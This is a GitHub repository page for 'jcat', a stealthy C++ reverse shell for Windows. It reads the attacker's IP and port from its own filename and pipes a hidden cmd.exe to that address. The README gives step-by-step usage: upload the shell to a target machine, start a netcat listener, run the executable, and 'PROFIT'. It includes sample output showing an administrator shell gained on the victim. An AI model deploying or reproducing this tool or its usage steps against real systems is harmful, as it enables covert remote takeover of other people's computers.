Skip to content
/ jcat Public

A silent C++ reverse shell that extracts IP and port from its name, connects to a listener, and provides remote command-line access.

Notifications You must be signed in to change notification settings

j3h4ck/jcat

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

jcat Reverse Shell

This repository contains my C++ reverse shell that runs in the background without displaying a window. The program connects to a specified IP and port extracted from the executable's filename, providing a remote shell interface.


πŸ“‹ Features

  • Stealth: Runs in the background without opening a window.
  • Dynamic Configuration: The IP address and port are encoded in the executable name, enabling customizable deployment.
  • Compact Implementation: Uses native Windows APIs and WinSock for networking.
  • Small Size: ~200kb.

πŸš€ How It Works

The executable name encodes the IP and port in the format:

  • jcat_<IP>_<PORT>.exe
  • jcat_192.168.1.100_4444.exe
  • jcat_192.168.1.121_80.exe

The program parses the IP and port from its name and establishes a reverse connection to the remote server. Once connected, it spawns a hidden cmd.exe process, redirecting its input, output, and error streams to the socket.


πŸ§‘β€πŸ’» Usage

  1. upload the shell to the target machine
  2. start a listener:
    nc -lvnp 80
  3. execute the shell:
    jcat_172.16.1.129_80.exe
  4. PROFIT!!!:
listening on [any] 80 ...
connect to [172.16.1.129] from (UNKNOWN) [172.16.1.131] 60507
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
tech\administrator

C:\Users\Administrator\Desktop>

About

A silent C++ reverse shell that extracts IP and port from its name, connects to a listener, and provides remote command-line access.

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages